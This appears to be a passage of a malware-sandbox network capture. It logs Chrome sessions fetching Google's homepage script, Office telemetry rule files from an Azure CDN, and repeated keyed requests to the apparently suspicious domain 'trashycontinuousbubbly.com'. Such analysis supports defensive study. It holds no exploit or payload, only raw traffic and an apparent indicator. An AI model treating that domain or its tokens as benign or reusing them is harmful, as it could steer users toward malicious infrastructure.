2024-11-07 06:33:24 UTC	177	IN	Data Raw: 32 63 38 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f Data Ascii: 2c88<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="/images/
2024-11-07 06:33:24 UTC	1378	IN	Data Raw: 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 52 4b 53 34 58 4e 30 67 49 6e 64 66 56 7a 41 31 62 74 44 59 59 41 22 3e 77 69 6e 64 6f 77 2e 5f 68 73 74 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 22 53 65 61 72 63 68 48 65 61 64 53 74 61 72 74 22 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 52 4b 53 34 58 4e 30 67 49 6e Data Ascii: branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="RKS4XN0gIndfVzA1btDYYA">window._hst=Date.now();performance&&performance.mark&&performance.mark("SearchHeadStart");</script><script nonce="RKS4XN0gIn
2024-11-07 06:33:24 UTC	1378	IN	Data Raw: 5d 7d 72 65 74 75 72 6e 22 2f 22 2b 28 6b 7c 7c 22 67 65 6e 5f 32 30 34 22 29 2b 22 3f 61 74 79 70 3d 69 26 63 74 3d 22 2b 53 74 72 69 6e 67 28 61 29 2b 22 26 63 61 64 3d 22 2b 28 62 2b 65 2b 64 29 7d 3b 6d 3d 67 6f 6f 67 6c 65 2e 6b 45 49 3b 67 6f 6f 67 6c 65 2e 67 65 74 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 71 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 6b 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6c 3a 65 3b 63 7c 7c 28 63 3d 74 28 61 2c 62 2c 65 2c 64 2c 6b 29 29 3b 69 66 28 63 3d 72 28 63 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 67 3d 6e 2e 6c 65 6e 67 74 68 3b 6e Data Ascii: ]}return"/"+(k\|\|"gen_204")+"?atyp=i&ct="+String(a)+"&cad="+(b+e+d)};m=google.kEI;google.getEI=p;google.getLEI=q;google.ml=function(){return null};google.log=function(a,b,c,d,k,e){e=e===void 0?l:e;c\|\|(c=t(a,b,e,d,k));if(c=r(c)){a=new Image;var g=n.length;n
2024-11-07 06:33:24 UTC	1378	IN	Data Raw: 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 61 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 69 66 28 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 41 22 29 7b 61 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 68 72 65 66 22 29 3d 3d 3d 22 31 22 3b 62 72 65 61 6b 20 61 7d 61 3d 21 31 7d 61 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 68 73 3d 7b 68 3a 74 72 75 65 2c 6e 68 73 3a 66 61 6c 73 65 2c 73 69 65 3a 66 61 6c 73 65 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 63 3d 7b 62 74 66 69 3a 66 61 6c 73 65 2c 63 34 74 3a 74 72 75 65 2c 63 61 Data Ascii: document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);(function(){google.hs={h:true,nhs:false,sie:false};})();(function(){google.c={btfi:false,c4t:true,ca
2024-11-07 06:33:24 UTC	1378	IN	Data Raw: 76 69 73 69 62 69 6c 69 74 79 3d 3d 3d 22 68 69 64 64 65 6e 22 7c 7c 61 2e 68 65 69 67 68 74 3d 3d 3d 22 30 70 78 22 26 26 61 2e 77 69 64 74 68 3d 3d 3d 22 30 70 78 22 29 29 3a 21 31 7d 0a 66 75 6e 63 74 69 6f 6e 20 65 61 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 76 61 72 20 68 3d 65 28 61 29 2c 6b 3d 68 2e 6c 65 66 74 2b 28 63 3f 30 3a 77 69 6e 64 6f 77 2e 70 61 67 65 58 4f 66 66 73 65 74 29 2c 6d 3d 68 2e 74 6f 70 2b 28 63 3f 30 3a 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 29 2c 6e 3d 68 2e 77 69 64 74 68 2c 66 3d 68 2e 68 65 69 67 68 74 2c 67 3d 30 3b 69 66 28 21 62 26 26 66 3c 3d 30 26 26 6e 3c 3d 30 29 72 65 74 75 72 6e 20 67 3b 62 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 Data Ascii: visibility==="hidden"\|\|a.height==="0px"&&a.width==="0px")):!1}function ea(a,b,c,d,e){var h=e(a),k=h.left+(c?0:window.pageXOffset),m=h.top+(c?0:window.pageYOffset),n=h.width,f=h.height,g=0;if(!b&&f<=0&&n<=0)return g;b=window.innerHeight\|\|document.document
2024-11-07 06:33:24 UTC	1378	IN	Data Raw: 22 73 74 72 69 6e 67 22 26 26 61 7c 7c 74 68 69 73 2e 67 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6c 7a 79 5f 22 2c 22 31 22 29 3b 74 68 69 73 2e 42 3f 62 3d 21 30 3a 62 7c 7c 78 26 26 74 68 69 73 2e 69 7c 7c 74 68 69 73 2e 6a 7c 7c 74 68 69 73 2e 6c 3f 62 3d 21 31 3a 28 62 3d 74 68 69 73 2e 67 2e 73 72 63 2c 62 3d 74 79 70 65 6f 66 20 62 21 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 21 62 2c 61 3d 74 68 69 73 2e 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 6d 70 22 29 2c 62 3d 0a 61 21 3d 3d 6e 75 6c 6c 3f 61 3d 3d 3d 22 31 22 3a 62 7c 7c 74 68 69 73 2e 67 2e 63 6f 6d 70 6c 65 74 65 29 3b 74 68 69 73 2e 41 3d 62 3b 78 7c 7c 74 68 69 73 2e 41 7c 7c 74 68 69 73 2e 69 7c 7c 45 28 74 68 69 73 29 3b 77 26 26 21 63 26 26 46 28 Data Ascii: "string"&&a\|\|this.g.setAttribute("data-lzy_","1");this.B?b=!0:b\|\|x&&this.i\|\|this.j\|\|this.l?b=!1:(b=this.g.src,b=typeof b!=="string"\|\|!b,a=this.g.getAttribute("data-cmp"),b=a!==null?a==="1":b\|\|this.g.complete);this.A=b;x\|\|this.A\|\|this.i\|\|E(this);w&&!c&&F(
2024-11-07 06:33:24 UTC	1378	IN	Data Raw: 67 74 68 3b 63 3c 64 3b 2b 2b 63 29 61 28 49 28 62 5b 63 5d 29 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 61 28 61 29 7b 69 66 28 61 26 26 28 61 3d 61 2e 74 61 72 67 65 74 2c 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 49 4d 47 22 29 29 7b 76 61 72 20 62 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 47 28 49 28 61 2c 76 6f 69 64 20 30 2c 21 30 2c 21 30 29 2c 62 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 61 29 7b 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 28 61 29 7d 3b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 74 61 72 74 54 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 5d 3d 7b 74 3a 7b 73 74 61 72 74 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 2c 65 3a 7b 7d 2c 6d 3a 7b 7d 7d 7d 3b 67 6f 6f 67 6c 65 2e 74 69 Data Ascii: gth;c<d;++c)a(I(b[c]))};function ra(a){if(a&&(a=a.target,a.tagName==="IMG")){var b=Date.now();G(I(a,void 0,!0,!0),b)}}function K(a){google.c.oil(a)};google.timers={};google.startTick=function(a){google.timers[a]={t:{start:Date.now()},e:{},m:{}}};google.ti
2024-11-07 06:33:24 UTC	1378	IN	Data Raw: 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 22 53 65 61 72 63 68 48 65 61 64 53 74 61 72 74 22 29 3b 76 61 72 20 4f 3b 69 66 28 28 4f 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 29 3d 3d 6e 75 6c 6c 3f 30 3a 4f 2e 73 74 61 72 74 29 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 2e 74 2e 73 74 61 72 74 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 73 74 61 72 74 3b 66 75 6e 63 74 69 6f 6e 20 50 28 61 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3d 3d 3d 22 68 69 64 64 65 6e 22 29 7b 67 6f 6f 67 6c 65 2e 63 2e 66 68 3d 61 3b 76 61 72 20 62 3b 74 26 26 28 62 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 2b 61 29 29 3b 67 6f 6f 67 6c 65 2e 74 69 63 6b 28 22 6c 6f 61 64 22 2c 22 66 68 74 22 2c 62 29 3b 72 65 74 75 72 6e 21 30 7d Data Ascii: formance.mark("SearchHeadStart");var O;if((O=google.stvsc)==null?0:O.start)google.timers.load.t.start=google.stvsc.start;function P(a){if(document.visibilityState==="hidden"){google.c.fh=a;var b;t&&(b=Math.floor(t+a));google.tick("load","fht",b);return!0}
2024-11-07 06:33:24 UTC	1378	IN	Data Raw: 7c 7c 63 3f 30 3a 54 28 22 71 73 75 62 74 73 22 29 3b 64 3e 30 26 26 28 63 3d 54 28 22 66 62 74 73 22 29 2c 63 3e 30 26 26 28 62 2e 74 2e 73 74 61 72 74 3d 4d 61 74 68 2e 6d 61 78 28 64 2c 63 29 29 29 3b 76 61 72 20 65 3d 62 2e 74 2c 68 3d 65 2e 73 74 61 72 74 3b 63 3d 7b 7d 3b 62 2e 77 73 72 74 21 3d 3d 76 6f 69 64 20 30 26 26 28 63 2e 77 73 72 74 3d 62 2e 77 73 72 74 29 3b 69 66 28 68 29 66 6f 72 28 76 61 72 20 6b 3d 30 2c 6d 3b 6d 3d 75 61 5b 6b 2b 2b 5d 3b 29 7b 76 61 72 20 6e 3d 65 5b 6d 5d 3b 6e 26 26 28 63 5b 6d 5d 3d 4d 61 74 68 2e 6d 61 78 28 6e 2d 68 2c 30 29 29 7d 64 3e 30 26 26 28 63 2e 67 73 61 73 72 74 3d 62 2e 74 2e 73 74 61 72 74 2d 64 29 3b 62 3d 62 2e 65 3b 61 3d 22 2f 67 65 6e 5f 32 30 34 3f 73 3d 22 2b 67 6f 6f 67 6c 65 2e 73 6e 2b 22 Data Ascii: \|\|c?0:T("qsubts");d>0&&(c=T("fbts"),c>0&&(b.t.start=Math.max(d,c)));var e=b.t,h=e.start;c={};b.wsrt!==void 0&&(c.wsrt=b.wsrt);if(h)for(var k=0,m;m=ua[k++];){var n=e[m];n&&(c[m]=Math.max(n-h,0))}d>0&&(c.gsasrt=b.t.start-d);b=b.e;a="/gen_204?s="+google.sn+"
2024-11-07 06:33:24 UTC	207	IN	Data Raw: 2c 6c 29 3b 66 21 3d 3d 6c 26 26 28 6e 3d 66 2c 67 3d 71 29 3b 66 3d 6c 3b 2b 2b 6d 3b 64 28 29 7d 76 61 72 20 68 3d 21 30 2c 6b 3d 30 2c 6d 3d 30 2c 6e 3d 30 2c 66 3d 30 2c 67 3b 4a 28 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 61 28 6c 29 26 26 28 2b 2b 6b 2c 6c 2e 69 7c 7c 6c 2e 41 3f 65 28 6c 2e 69 7c 7c 30 2c 6c 2e 67 29 3a 6c 2e 76 2e 70 75 73 68 28 65 29 29 7d 29 3b 62 28 29 3b 68 3d 21 31 3b 64 28 29 7d 3b 76 61 72 20 57 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 3b 66 75 6e 63 74 69 6f 6e 20 79 61 28 29 7b 69 66 28 67 6f 6f 67 6c 65 2e 63 2e 63 34 74 26 26 57 26 26 57 2e 6d 61 72 6b 26 26 57 0d 0a Data Ascii: ,l);f!==l&&(n=f,g=q);f=l;++m;d()}var h=!0,k=0,m=0,n=0,f=0,g;J(function(l){a(l)&&(++k,l.i\|\|l.A?e(l.i\|\|0,l.g):l.v.push(e))});b();h=!1;d()};var W=window.performance;function ya(){if(google.c.c4t&&W&&W.mark&&W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	49891	172.240.127.234	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:24 UTC	1006	OUT	GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1 Host: trashycontinuousbubbly.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
2024-11-07 06:33:24 UTC	755	IN	HTTP/1.1 200 OK Server: nginx/1.21.6 Date: Thu, 07 Nov 2024 06:33:24 GMT Content-Type: text/html Content-Length: 0 Connection: close P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Accept-CH: Device-Stock-UA,Sec-CH-UA,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-PlatformUser-Agent,User-Agent,X-Device-User-Agent,X-OperaMini-Phone-UA,X-UCBrowser-Device-UA Host: trashycontinuousbubbly.com Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache X-Request-ID: b5fc7b3c467b6fa2e974caa25a5e52a5 Cache-Control: max-age=0, private, no-cache Pragma: no-cache Strict-Transport-Security: max-age=0; includeSubdomains

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	49892	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:24 UTC	192	OUT	GET /rules/rule700500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:24 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:24 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE51CE7B3" x-ms-request-id: 9f0c8f5e-f01e-0020-2b6b-2e956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063324Z-15869dbbcc6rzfwxhC1DFWrkb000000002v000000000dc5s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:24 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	49893	172.240.127.234	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:24 UTC	1006	OUT	GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1 Host: trashycontinuousbubbly.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
2024-11-07 06:33:24 UTC	755	IN	HTTP/1.1 200 OK Server: nginx/1.21.6 Date: Thu, 07 Nov 2024 06:33:24 GMT Content-Type: text/html Content-Length: 0 Connection: close P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Accept-CH: Device-Stock-UA,Sec-CH-UA,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-PlatformUser-Agent,User-Agent,X-Device-User-Agent,X-OperaMini-Phone-UA,X-UCBrowser-Device-UA Host: trashycontinuousbubbly.com Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache X-Request-ID: 189b957358d75b3e0a71455288456d75 Cache-Control: max-age=0, private, no-cache Pragma: no-cache Strict-Transport-Security: max-age=0; includeSubdomains

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	49896	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:24 UTC	192	OUT	GET /rules/rule701351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:25 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:24 GMT Content-Type: text/xml Content-Length: 1407 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE687B46A" x-ms-request-id: fda52046-a01e-001e-025c-2e49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063324Z-15869dbbcc6pfq2ghC1DFWmp140000000130000000000xs9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:25 UTC	1407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	49895	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:24 UTC	192	OUT	GET /rules/rule702550v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:25 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:25 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE584C214" x-ms-request-id: cd73f999-901e-00a0-1f58-2e6a6d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063325Z-15869dbbcc6khw88hC1DFWbb20000000016000000000nzbg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:25 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	49894	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:24 UTC	192	OUT	GET /rules/rule702551v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:25 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:25 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCE9703A" x-ms-request-id: 907428a7-401e-0064-0bfb-2e54af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063325Z-17df447cdb5wrr5fhC1DFWte8n000000043g00000000cu9x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:25 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
